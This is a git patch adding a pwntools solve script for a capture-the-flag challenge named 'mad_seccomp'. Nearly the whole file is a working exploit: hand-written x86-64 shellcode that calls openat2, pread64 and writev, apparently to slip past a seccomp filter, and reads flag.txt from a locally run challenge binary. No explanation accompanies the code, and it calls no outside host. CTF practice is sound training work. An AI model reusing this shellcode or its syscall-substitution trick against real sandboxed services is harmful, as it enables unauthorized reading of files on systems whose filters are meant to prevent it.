From 4153f58c73f16d1b134e9ce2bb95a2316f14ea12 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Mon, 28 Oct 2024 16:26:11 +0300
Subject: [PATCH] solve script

---
 random_challs/mad_seccomp/a.py | 40 ++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 random_challs/mad_seccomp/a.py

diff --git a/random_challs/mad_seccomp/a.py b/random_challs/mad_seccomp/a.py
new file mode 100644
index 0000000..96a013b
--- /dev/null
+++ b/random_challs/mad_seccomp/a.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./mad_seccomp", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = """
+lea rsi, [rax+108]
+lea rdx, [rax+200]
+mov QWORD PTR [rdx], 2
+mov QWORD PTR [rdx+16], 16
+mov rax, 437
+mov rdi, -100
+mov r10, 24
+syscall
+mov rdi, rax
+mov al, 17
+lea rsi, [rdx+100]
+mov rdx, 100
+sub r10b, r10b
+syscall
+lea r11, [rsi]
+mov QWORD PTR [rsi+100], r11
+mov QWORD PTR [rsi+108], rax
+mov rdi, 1
+lea rsi, [rsi+100]
+mov rdx, 1
+mov rax, 20
+syscall
+"""
+sc = asm(sc)
+sc += b"flag.txt\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file